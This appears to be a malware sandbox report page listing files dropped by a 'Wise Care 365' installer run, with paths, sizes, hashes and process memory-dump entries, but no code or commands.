4dbb2ef7374137edd0e7608822223188dda924967edd8d6650427eace2f90481a8f64b9c3f8bfdec5bc3dd31952d1491685562ce617f2c2c5afc5070cc9a62d0

Download Submit
C:\ProgramData\ConsoleApp\main.bat
Filesize
236B

MD5
0ddc6dd98f86cff7e50c1621fd16b55a

SHA1
27e61b2bf7a367c491f25a3ef70df2ef0e38c36a

SHA256
b0a5f27817ebca5a17f75d625f1c73dc0d1c2499f1d155916d5a404013856df6

SHA512
07cb691bb23bb75c2c72c3e915b7af1f8b8c831f3d77e81c67f95c5d1ec7f754a7b823b9f1cdecd5cc511a4c34a6e8f0938eaad52f8d6451fee973ecfd2b9609

Download Submit
C:\ProgramData\Local\Microsoft\Windows\Telemetry\wlanext32.exe
Filesize
5.3MB

MD5
654cdcbcb0eb566c0871dc39ee7ef6c0

SHA1
53f5f2340f3c621a03ecf2910af7db59a943682c

SHA256
4159e2b4279685b57b9e13d3a58a2dbc933261fcf8116d5ac3b76485e843b411

SHA512
ca81062cf37bcd49149183d43129298b8fb2343ae5e038261d128207d8db2ec9a927b38b7e7a8b7c5058deadf00e8a411b6af0b7108391a5855048725af674a3

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-8A70E.tmp\ISTask.dll
Filesize
66KB

MD5
86a1311d51c00b278cb7f27796ea442e

SHA1
ac08ac9d08f8f5380e2a9a65f4117862aa861a19

SHA256
e916bdf232744e00cbd8d608168a019c9f41a68a7e8390aa48cfb525276c483d

SHA512
129e4b8dd2665bcfc5e72b4585343c51127b5d027dbb0234291e7a197baeca1bab5ed074e65e5e8c969ee01f9f65cc52c9993037416de9bfff2f872e5aeba7ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-8A70E.tmp\ISTask.dll
Filesize
66KB

MD5
86a1311d51c00b278cb7f27796ea442e

SHA1
ac08ac9d08f8f5380e2a9a65f4117862aa861a19

SHA256
e916bdf232744e00cbd8d608168a019c9f41a68a7e8390aa48cfb525276c483d

SHA512
129e4b8dd2665bcfc5e72b4585343c51127b5d027dbb0234291e7a197baeca1bab5ed074e65e5e8c969ee01f9f65cc52c9993037416de9bfff2f872e5aeba7ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-8A70E.tmp\VclStylesInno.dll
Filesize
3.0MB

MD5
b0ca93ceb050a2feff0b19e65072bbb5

SHA1
7ebbbbe2d2acd8fd516f824338d254a33b69f08d

SHA256
0e93313f42084d804b9ac4be53d844e549cfcaf19e6f276a3b0f82f01b9b2246

SHA512
37242423e62af30179906660c6dbbadca3dc2ba9e562f84315a69f3114765bc08e88321632843dbd78ba1728f8d1ce54a4edfa3b96a9d13e540aee895ae2d8e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-8A70E.tmp\VclStylesInno.dll
Filesize
3.0MB

MD5
b0ca93ceb050a2feff0b19e65072bbb5

SHA1
7ebbbbe2d2acd8fd516f824338d254a33b69f08d

SHA256
0e93313f42084d804b9ac4be53d844e549cfcaf19e6f276a3b0f82f01b9b2246

SHA512
37242423e62af30179906660c6dbbadca3dc2ba9e562f84315a69f3114765bc08e88321632843dbd78ba1728f8d1ce54a4edfa3b96a9d13e540aee895ae2d8e2

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-BKVH8.tmp\aad0024d7c30bf6fee7c90d90371ca14.tmp
Filesize
2.4MB

MD5
f098bb35dca6ae44a05c65aac7a5444b

SHA1
c5c50d740c1b8e9d8715fc3b2c8026156295a437

SHA256
8a0163353bdcc0882008990b0479c571c91adaca143af8c03da145b28b02e1fe

SHA512
71d8fc99a67bfc1e2b3635db6092d51d2ae9ec47f652aa10234770e878ab8bfaad69f7b971d54169363763df59ebb33143d161cd2a1cb60bc6fa2bbe6ba0227b

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-HT95T.tmp\Wise Care 365 5.9.1.582.exe
Filesize
35.4MB

MD5
05fda662bb382c2c95b9318b2394b246

SHA1
69365314afb6102209a806e0e474d94e58207ec6

SHA256
1cdf90593f92f8de7a6a8b812756ff9359a0a9827f0843ef40e1983f17d6b8d2

SHA512
b8d792f5529672227b94c55a2e914b8bbc569d9ce70e5c17022a5568dc51febb4fb0a497009d4975f8dc7574989041edf093285d62c34f09d5d55da09869f312

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-HT95T.tmp\Wise Care 365 5.9.1.582.exe
Filesize
35.4MB

MD5
05fda662bb382c2c95b9318b2394b246

SHA1
69365314afb6102209a806e0e474d94e58207ec6

SHA256
1cdf90593f92f8de7a6a8b812756ff9359a0a9827f0843ef40e1983f17d6b8d2

SHA512
b8d792f5529672227b94c55a2e914b8bbc569d9ce70e5c17022a5568dc51febb4fb0a497009d4975f8dc7574989041edf093285d62c34f09d5d55da09869f312

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-HT95T.tmp\_isetup\_iscrypt.dll
Filesize
2KB

MD5
a69559718ab506675e907fe49deb71e9

SHA1
bc8f404ffdb1960b50c12ff9413c893b56f2e36f

SHA256
2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

SHA512
e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-SF6LE.tmp\Wise Care 365 5.9.1.582.tmp
Filesize
911KB

MD5
9d7850e858c24db77b91b25adf93812f

SHA1
f0bb0a9074b38dad7492422247c0a316197d26b6

SHA256
c062235322d35c79cfde7aea5fd90e9589e5fbca738ed41ab66de382e1a1b2e8

SHA512
e08084f265913a71d55750b75bbb01d1c43baa68d57eb9d6bc4ed46076577536b10901c06b92c66a926e07e268593b69936050cfacb8ed8e62b8fad86444e8ec

Download Submit
memory/320-152-0x0000000000000000-mapping.dmp

Download
memory/440-177-0x0000000000000000-mapping.dmp

Download
memory/536-165-0x0000000000000000-mapping.dmp

Download
memory/640-150-0x0000000000000000-mapping.dmp

Download
memory/768-163-0x0000000000000000-mapping.dmp

Download
memory/892-199-0x0000000000000000-mapping.dmp

Download
memory/1000-159-0x0000000000000000-mapping.dmp

Download
memory/1076-136-0x0000000000000000-mapping.dmp

Download
memory/1084-188-0x0000000000000000-mapping.dmp

Download
memory/1088-190-0x0000000000000000-mapping.dmp

Download
memory/1104-204-0x0000000000000000-mapping.dmp

Download
memory/1164-192-0x0000000000000000-mapping.dmp

Download
memory/1172-208-0x0000000000000000-mapping.dmp

Download
memory/1384-169-0x0000000000000000-mapping.dmp

Download
memory/1392-196-0x0000000000000000-mapping.dmp

Download
memory/1456-206-0x0000000000000000-mapping.dmp

Download
memory/1664-183-0x0000000000000000-mapping.dmp

Download
memory/1772-137-0x0000000000000000-mapping.dmp

Download
memory/1784-201-0x0000000000000000-mapping.dmp

Download
memory/1888-337-0x0000000000BE0000-0x0000000000D35000-memory.dmp

Filesize
1.3MB

Download
memory/1888-341-0x0000000000BE0000-0x0000000000D35000-memory.dmp

Filesize
1.3MB

Download
memory/1888-339-0x0000000000BE0000-0x0000000000D35000-memory.dmp

Filesize
1.3MB

Download
memory/1896-157-0x0000000000000000-mapping.dmp

Download
memory/1900-210-0x0000000000000000-mapping.dmp

Download
memory/1992-162-0x0000000000000000-mapping.dmp

Download
memory/2136-166-0x0000000000000000-mapping.dmp

Download
memory/2212-333-0x00007FFC61070000-0x00007FFC61B31000-memory.dmp

Filesize
10.8MB

Download
memory/2212-332-0x0000000000910000-0x0000000000932000-memory.dmp

Filesize
136KB

Download
memory/2212-335-0x00007FFC61070000-0x00007FFC61B31000-memory.dmp

Filesize
10.8MB

Download
memory/2236-334-0x0000000000BE0000-0x0000000000D35000-memory.dmp

Filesize
1.3MB

Download
memory/2236-336-0x0000000000BE0000-0x0000000000D35000-memory.dmp

Filesize
1.3MB

Download
memory/2236-331-0x0000000000BE0000-0x0000000000D35000-memory.dmp

Filesize
1.3MB

Download
memory/2248-156-0x0000000000000000-mapping.dmp

Download
memory/2268-213-0x0000000000000000-mapping.dmp

Download
memory/2268-141-0x0000000000000000-mapping.dmp

Download
memory/2304-185-0x0000000000000000-mapping.dmp

Download
memory/2364-187-0x0000000000000000-mapping.dmp

Download
memory/2476-330-0x00000000005E0000-0x00000000006C0000-memory.dmp

Filesize
896KB

Download
memory/2628-212-0x0000000000000000-mapping.dmp

Download
memory/2660-171-0x0000000000000000-mapping.dmp

Download
memory/2800-207-0x0000000000000000-mapping.dmp

Download
memory/2864-198-0x0000000000400000-0x00000000004C0000-memory.dmp

Filesize
768KB

Download
memory/2864-130-0x0000000000400000-0x00000000004C0000-memory.dmp

Filesize
768KB

Download
memory/2864-134-0x0000000000400000-0x00000000004C0000-memory.dmp

Filesize
768KB

Download
memory/2944-132-0x0000000000000000-mapping.dmp

Download
memory/2964-160-0x0000000000000000-mapping.dmp

Download
memory/2968-184-0x0000000000000000-mapping.dmp

Download
memory/3196-172-0x0000000000000000-mapping.dmp

Download
memory/3216-186-0x0000000000000000-mapping.dmp

Download
memory/3276-195-0x0000000000000000-mapping.dmp

Download
memory/3336-167-0x0000000000000000-mapping.dmp

Download
memory/3364-164-0x0000000000000000-mapping.dmp

Download
memory/3432-178-0x0000000000000000-mapping.dmp

Download
memory/3436-216-0x0000000000400000-0x0000000000417000-memory.dmp

Filesize
92KB

Download
memory/3436-316-0x0000000000400000-0x0000000000417000-memory.dmp

Filesize
92KB

Download
memory/3436-221-0x0000000000400000-0x0000000000417000-memory.dmp

Filesize
92KB

Download
memory/3600-211-0x0000000000000000-mapping.dmp

Download
memory/3708-193-0x0000000000000000-mapping.dmp

Download
memory/3772-144-0x0000000004F90000-0x0000000004FB2000-memory.dmp

Filesize
136KB

Download
memory/3772-149-0x0000000006450000-0x000000000646A000-memory.dmp

Filesize
104KB

Download
memory/3772-145-0x00000000057C0000-0x0000000005826000-memory.dmp

Filesize
408KB

Download
memory/3772-140-0x0000000000000000-mapping.dmp

Download
memory/3772-147-0x0000000005F40000-0x0000000005F5E000-memory.dmp

Filesize
120KB

Download
memory/3772-143-0x0000000005120000-0x0000000005748000-memory.dmp

Filesize
6.2MB

Download
memory/3772-148-0x0000000007580000-0x0000000007BFA000-memory.dmp

Filesize
6.5MB

Download
memory/3772-146-0x0000000005920000-0x0000000005986000-memory.dmp

Filesize
408KB

Download
memory/3772-142-0x0000000002960000-0x0000000002996000-memory.dmp

Filesize
216KB

Download
memory/3900-194-0x0000000000000000-mapping.dmp

Download
memory/3980-317-0x0000000000560000-0x00000000005C0000-memory.dmp

Filesize
384KB

Download
memory/3988-214-0x0000000000000000-mapping.dmp

Download
memory/4000-203-0x0000000000000000-mapping.dmp

Download
memory/4148-170-0x0000000000000000-mapping.dmp

Download
memory/4176-179-0x0000000000000000-mapping.dmp

Download
memory/4200-180-0x0000000000000000-mapping.dmp

Download
memory/4208-191-0x0000000000000000-mapping.dmp

Download
memory/4320-197-0x0000000000000000-mapping.dmp

Download
memory/4340-182-0x0000000000000000-mapping.dmp

Download
memory/4368-340-0x0000000000BE0000-0x0000000000D35000-memory.dmp

Filesize
1.3MB

Download
memory/4368-338-0x0000000000BE0000-0x0000000000D35000-memory.dmp

Filesize
1.3MB

Download
memory/4548-181-0x0000000000000000-mapping.dmp

Download
memory/4640-189-0x0000000000000000-mapping.dmp

Download
memory/4728-176-0x0000000000000000-mapping.dmp

Download
memory/4780-266-0x0000000007650000-0x0000000007790000-memory.dmp

Filesize
1.2MB

Download
memory/4780-249-0x0000000007650000-0x0000000007790000-memory.dmp

Filesize
1.2MB

Download
memory/4780-296-0x0000000007650000-0x0000000007790000-memory.dmp

Filesize
1.2MB

Download
memory/4780-298-0x0000000007650000-0x0000000007790000-memory.dmp

Filesize
1.2MB

Download
memory/4780-299-0x0000000007650000-0x0000000007790000-memory.dmp

Filesize
1.2MB

Download
memory/4780-301-0x0000000007650000-0x0000000007790000-memory.dmp

Filesize
1.2MB

Download
memory/4780-294-0x0000000007650000-0x0000000007790000-memory.dmp

Filesize
1.2MB

Download
memory/4780-272-0x0000000007650000-0x0000000007790000-memory.dmp

Filesize
1.2MB

Download
memory/4780-269-0x0000000007650000-0x0000000007790000-memory.dmp

Filesize
1.2MB

Download
memory/4780-245-0x0000000007650000-0x0000000007790000-memory.dmp

Filesize
1.2MB

Download
memory/4780-282-0x0000000007650000-0x0000000007790000-memory.dmp

Filesize
1.2MB

Download
memory/4780-309-0x0000000007650000-0x0000000007790000-memory.dmp

Filesize
1.2MB

Download
memory/4780-246-0x0000000007650000-0x0000000007790000-memory.dmp

Filesize
1.2MB

Download
memory/4780-244-0x0000000007650000-0x0000000007790000-memory.dmp

Filesize
1.2MB

Download
memory/4780-263-0x0000000007650000-0x0000000007790000-memory.dmp

Filesize
1.2MB

Download
memory/4780-300-0x0000000007650000-0x0000000007790000-memory.dmp

Filesize
1.2MB

Download
memory/4780-283-0x0000000007650000-0x0000000007790000-memory.dmp

Filesize
1.2MB

Download
memory/4780-291-0x0000000007650000-0x0000000007790000-memory.dmp

Filesize
1.2MB

Download
memory/4780-175-0x0000000000000000-mapping.dmp

Download
memory/4780-287-0x0000000007650000-0x0000000007790000-memory.dmp

Filesize
1.2MB

Download
memory/4780-247-0x0000000007650000-0x0000000007790000-memory.dmp

Filesize
1.2MB

Download
memory/4780-281-0x0000000007650000-0x0000000007790000-memory.dmp

Filesize
1.2MB

Download
memory/4780-277-0x0000000007650000-0x0000000007790000-memory.dmp

Filesize
1.2MB

Download
memory/4780-276-0x0000000007650000-0x0000000007790000-memory.dmp

Filesize
1.2MB

Download
memory/4780-242-0x0000000007650000-0x0000000007790000-memory.dmp

Filesize
1.2MB

Download
memory/4780-271-0x0000000007650000-0x0000000007790000-memory.dmp

Filesize
1.2MB

Download
memory/4780-268-0x0000000007650000-0x0000000007790000-memory.dmp

Filesize
1.2MB

Download
memory/4780-279-0x0000000007650000-0x0000000007790000-memory.dmp

Filesize
1.2MB

Download
memory/4780-264-0x0000000007650000-0x0000000007790000-memory.dmp

Filesize
1.2MB

Download
memory/4780-261-0x0000000007650000-0x0000000007790000-memory.dmp

Filesize
1.2MB

Download
memory/4780-252-0x0000000007650000-0x0000000007790000-memory.dmp

Filesize
1.2MB

Download
memory/4780-297-0x0000000007331000-0x00000000075BF000-memory.dmp

Filesize
2.6MB

Download
memory/4780-241-0x0000000007650000-0x0000000007790000-memory.dmp

Filesize
1.2MB

Download
memory/4780-228-0x0000000007100000-0x0000000007116000-memory.dmp

Filesize
88KB

Download
memory/4780-234-0x0000000007650000-0x0000000007790000-memory.dmp

Filesize
1.2MB

Download
memory/4780-240-0x0000000007650000-0x0000000007790000-memory.dmp

Filesize
1.2MB

Download
memory/4780-259-0x0000000007650000-0x0000000007790000-memory.dmp

Filesize
1.2MB

Download
memory/4780-235-0x0000000007650000-0x0000000007790000-memory.dmp

Filesize
1.2MB

Download
memory/4780-237-0x0000000007650000-0x0000000007790000-memory.dmp

Filesize
1.2MB

Download
memory/4780-238-0x0000000007650000-0x0000000007790000-memory.dmp

Filesize
1.2MB

Download
memory/4780-250-0x0000000007650000-0x0000000007790000-memory.dmp

Filesize
1.2MB

Download
memory/4780-239-0x0000000007650000-0x0000000007790000-memory.dmp

Filesize
1.2MB

Download
memory/4780-254-0x0000000007650000-0x0000000007790000-memory.dmp

Filesize
1.2MB

Download
memory/4780-233-0x0000000007330000-0x000000000764A000-memory.dmp

Filesize
3.1MB

Download
memory/4824-168-0x0000000000000000-mapping.dmp

Download
memory/4828-161-0x0000000000000000-mapping.dmp

Download
memory/4856-173-0x0000000000000000-mapping.dmp

Download
memory/4876-200-0x0000000000000000-mapping.dmp

Download
memory/4912-209-0x0000000000000000-mapping.dmp

Download
memory/4976-320-0x0000000005D50000-0x0000000006368000-memory.dmp

Filesize
6.1MB

Download
memory/4976-318-0x0000000000400000-0x0000000000420000-memory.dmp

Filesize
128KB

Download
memory/4976-329-0x0000000008870000-0x0000000008D9C000-memory.dmp

Filesize
5.2MB

Download
memory/4976-327-0x0000000005CF0000-0x0000000005D0E000-memory.dmp

Filesize
120KB

Download
memory/4976-321-0x0000000005750000-0x0000000005762000-memory.dmp

Filesize
72KB

Download
memory/4976-322-0x0000000005880000-0x000000000598A000-memory.dmp

Filesize
1.0MB

Download
memory/4976-319-0x0000000000B80000-0x0000000000BA0000-memory.dmp

Filesize
128KB

Download
memory/4976-328-0x0000000008170000-0x0000000008332000-memory.dmp

Filesize
1.8MB

Download
memory/4976-326-0x0000000006920000-0x0000000006EC4000-memory.dmp

Filesize
5.6MB

Download
memory/4976-325-0x0000000005C10000-0x0000000005CA2000-memory.dmp

Filesize
584KB

Download
memory/4976-323-0x00000000057B0000-0x00000000057EC000-memory.dmp

Filesize
240KB

Download
memory/4976-324-0x0000000005AF0000-0x0000000005B66000-memory.dmp

Filesize
472KB

Download
memory/5016-205-0x0000000000000000-mapping.dmp

Download
memory/5024-174-0x0000000000000000-mapping.dmp

Download
memory/5080-202-0x0000000000000000-mapping.dmp

Download